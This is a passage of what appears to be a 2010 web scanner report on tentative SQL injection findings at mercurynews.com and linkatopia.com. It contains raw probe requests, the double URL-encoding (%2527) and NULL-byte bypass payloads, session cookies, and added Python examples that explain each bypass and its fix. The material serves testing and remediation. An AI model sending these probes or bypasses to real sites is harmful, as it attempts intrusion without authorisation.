HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ck8dha87tii3i18d86dla33dp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html
Update page count failed
Request 2
GET /?1''=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l2lgsa9e86pdberkmocnijggr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the highlighted excerpt of Response 1 ends at the line s.pageType=""; // Error pages ONLY, which is a comment in the site's SiteCatalyst-style analytics JavaScript and is present on ordinary article pages; the "general error message" appears to be that comment rather than database output, and Response 2 is the same article. Treat this finding as a probable false positive unless a genuine database error can be provoked.
Request 1
GET /49ers/ci_16794130?source=most_viewed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /49ers/ci_16794130?source=most_viewed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the fPage finding, the matched text in Response 1 is the analytics comment // Error pages ONLY that every article page carries, and Response 2 is a 302 to the registration gateway (nclick_check=1&forced=true), which is the site's article click-count gate rather than anything database-related. Treat this finding as a probable false positive.
Request 1
GET /action-line/ci_16799546 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But the postal service mixed up the contents of two packages they opened sending the wrong ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /action-line/ci_16799546 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/action-line/ci_16799546?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:45:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:45:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 446
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
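The linkatopia.com findings above ("Update referer failed", "Update user agent failed", "Update page count failed") and the cookie findings on mercurynews.com all rest on the same two-request probe: one quote breaks the statement, two quotes do not. The following Python is an added example, not code from the report or from any of the scanned sites. It reproduces that behaviour against an in-memory SQLite table (constructed for the example) using a string-built INSERT of the kind the "Update referer failed" responses imply, and shows the parameterised form that accepts both probes unchanged. It also shows something the scanner does not report: on the vulnerable handler the two-quote probe "succeeds" only by storing a corrupted value.

```python
import sqlite3

# The probe base used in the Referer findings; the quotes are appended to it.
PROBE_BASE = "http://www.google.com/search?hl=en&q="


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE referers (url TEXT)")
    return conn


def update_referer_vulnerable(conn: sqlite3.Connection, referer: str) -> str:
    """String-built INSERT: the pattern the 'Update referer failed' behaviour implies."""
    sql = f"INSERT INTO referers (url) VALUES ('{referer}')"
    try:
        conn.execute(sql)
        return "ok"
    except sqlite3.Error:
        # One quote closes the literal early and leaves the statement unterminated,
        # so it fails to parse. Two quotes are the SQL escape for a single quote
        # inside a literal, so the statement parses (and stores one quote).
        return "Update referer failed"


def update_referer_safe(conn: sqlite3.Connection, referer: str) -> str:
    """Parameterised INSERT: the value is bound as data and can never alter the statement."""
    conn.execute("INSERT INTO referers (url) VALUES (?)", (referer,))
    return "ok"


def quote_probe(handler, conn: sqlite3.Connection) -> tuple:
    """Reproduce the scanner's two-request test: one quote, then two quotes."""
    one = handler(conn, PROBE_BASE + "'")
    two = handler(conn, PROBE_BASE + "''")
    return one, two


def stored_urls(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT url FROM referers ORDER BY rowid")]


def demonstrate(handler) -> tuple:
    """Run the probe against a fresh table and return (probe results, stored rows)."""
    conn = fresh_db()
    results = quote_probe(handler, conn)
    return results, stored_urls(conn)


if __name__ == "__main__":
    print("vulnerable:", demonstrate(update_referer_vulnerable))
    print("safe:      ", demonstrate(update_referer_safe))
```

Run against the vulnerable handler the probe returns ("Update referer failed", "ok") and the table holds a single row ending in one quote, because the doubled quote was interpreted as an escape rather than stored as sent. The parameterised handler returns ("ok", "ok") and stores both values exactly as submitted. That is also why the "error disappears" signal is meaningful: a handler that escaped or bound its input would never have produced the first error at all.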
1.170. http://www.mercurynews.com/bay-area-living/ci_16790631 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /bay-area-living/ci_16790631
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with the two cookie findings on this host, the matched text in Response 1 is the analytics comment // Error pages ONLY that ordinary article pages carry, and Response 2 is a 302 back to the article; treat this as a probable false positive.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the application server will already have decoded parameter names once when parsing the query string. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before it.
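The double-encoding bypass reported here, for the BIGipServerAPACHE_DEV cookie and Referer header on fremonttoyota.com and for this parameter name, comes down to the order of two operations. The following Python is an added example, not code from the report or from the scanned applications: it models the single decode the runtime performs before application code runs, a blocklist check (the token list is an assumption; the report does not say what the applications actually block), and the two possible orderings of that check and a second decode. Only the validate-then-decode ordering lets %2527 reach the query as a bare quote.

```python
from urllib.parse import unquote

# Characters the application is presumed to reject. This list is an assumption for
# illustration; the report only says the application "attempts to block" SQL
# injection and that %2527 gets through.
BLOCKED_TOKENS = ("'", '"', ";", "--")


def contains_blocked(value: str) -> bool:
    return any(token in value for token in BLOCKED_TOKENS)


def as_received_by_application(wire_value: str) -> str:
    """Model the single URL-decode that happens before application code runs.

    For a cookie or query parameter in PHP the runtime decodes once when it fills
    $_COOKIE / $_GET; for a URL path the web server does it. Either way the
    application sees the result of exactly one decode.
    """
    return unquote(wire_value)


def validate_then_decode(param: str) -> str:
    """The vulnerable ordering the report describes.

    The blocklist runs on the once-decoded value, and only afterwards does the
    application URL-decode a second time, re-introducing the quote the check
    never saw.
    """
    if contains_blocked(param):
        return "blocked"
    canonical = unquote(param)  # second decode, after validation
    return f"query built with: {canonical}"


def decode_then_validate(param: str) -> str:
    """The remediated ordering: canonicalise first, then validate.

    Better still is not to decode a second time at all and to bind the value in a
    parameterised query, but if custom canonicalisation exists it must precede
    every check that depends on the value's final form.
    """
    canonical = unquote(param)
    if contains_blocked(canonical):
        return "blocked"
    return f"query built with: {canonical}"


def probe(handler, wire_value: str) -> str:
    """Send `wire_value` as the attacker would and report what the handler does."""
    return handler(as_received_by_application(wire_value))


if __name__ == "__main__":
    for payload in ("'", "%27", "%2527"):
        print(f"{payload:6} validate-then-decode: {probe(validate_then_decode, payload)}")
        print(f"{payload:6} decode-then-validate: {probe(decode_then_validate, payload)}")
```

Run it and the three payloads show the difference: ' and %27 are blocked by both handlers, while %2527 gets through only when validation precedes the second decode. decode_then_validate is the minimal fix the remediation detail calls for; dropping the second decode and binding the value in a parameterised query removes the need for the blocklist altogether.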
Request 1
GET /bay-area-living/ci_16790631?1%2527=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='I had to stop to catch my breath "... and to check to see if my toes still moved. They did. ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /bay-area-living/ci_16790631?1%2527%2527=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/bay-area-living/ci_1 ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /breaking-news/ci_16799837 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A family awoke to their doorbell ringing repeatedly this morning because of an electrical g ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /breaking-news/ci_16799837 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/breaking-news/ci_167 ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /breaking-news/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /breaking-news/ci_16799883 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/breaking-news/ci_16799883?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:38:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:38:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
1.173. http://www.mercurynews.com/breaking-news/ci_16800002 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /breaking-news/ci_16800002
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
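The NULL-byte bypass described above depends on two components reading the same bytes differently: a filter written in C stops at the first NUL because that is where a C string ends, while the managed application behind it keeps the whole buffer and still sees the quote that follows. The example below is added here and is not code from the report, the site or any WAF vendor; the function names and the two sample inputs, rebuilt from the probes in this section, are constructed for illustration. It uses ctypes to read the decoded value with C string semantics, contrasts that with a length-aware read of the same buffer, and shows the quote still reaching the application in both cases. The same bypass is reported later in this section for the User-Agent header and for the parameter name on /business/ci_16792615.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Constructed from the probes in the report: a parameter name of 1%00' and a
# User-Agent ending in %00', each as the bytes left after one URL decode.
PARAM_NAME = unquote_to_bytes("1%00'")
USER_AGENT = unquote_to_bytes("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'")


def c_string_view(raw):
    """What a NUL-terminated C string holds. ctypes.string_at with no size
    uses strlen, so the read stops at the first 0x00 byte. Python bytes
    objects are always NUL-terminated internally, so this cannot over-read."""
    return ctypes.string_at(raw)


def length_aware_view(raw):
    """A read that carries the buffer length sees every byte."""
    return ctypes.string_at(raw, len(raw))


def native_filter_allows(raw):
    """Filter modelled on a native-code WAF rule that rejects a single quote
    but scans the value as a C string."""
    return b"'" not in c_string_view(raw)


def fixed_filter_allows(raw):
    """Same rule, scanning the full length of the buffer instead."""
    return b"'" not in length_aware_view(raw)


def app_receives_quote(raw):
    """A managed runtime passes the complete value on, NUL included, so the
    quote still reaches whatever builds the SQL query."""
    return b"'" in raw


def classify(raw):
    """Summarise the round trip for one input."""
    return {
        "native_filter_allows": native_filter_allows(raw),
        "fixed_filter_allows": fixed_filter_allows(raw),
        "quote_reaches_app": app_receives_quote(raw),
    }


if __name__ == "__main__":
    for label, raw in (("param name", PARAM_NAME),
                       ("User-Agent", USER_AGENT),
                       ("plain quote", b"1'")):
        print(label, classify(raw))
```

For both sample inputs the native-style filter reports no quote while the application still receives one; the plain 1' input, with no NUL, is caught by both filters. Fixing the WAF's string handling closes this particular bypass, but as the remediation note says, the application-side query must be parameterised regardless.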
Request 1
GET /breaking-news/ci_16800002?1%00'=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Santa Clara County Board of Supervisors voted unanimously to cap the unused days of vac ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /breaking-news/ci_16800002?1%00''=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/breaking-news/ci_168 ...[SNIP]...
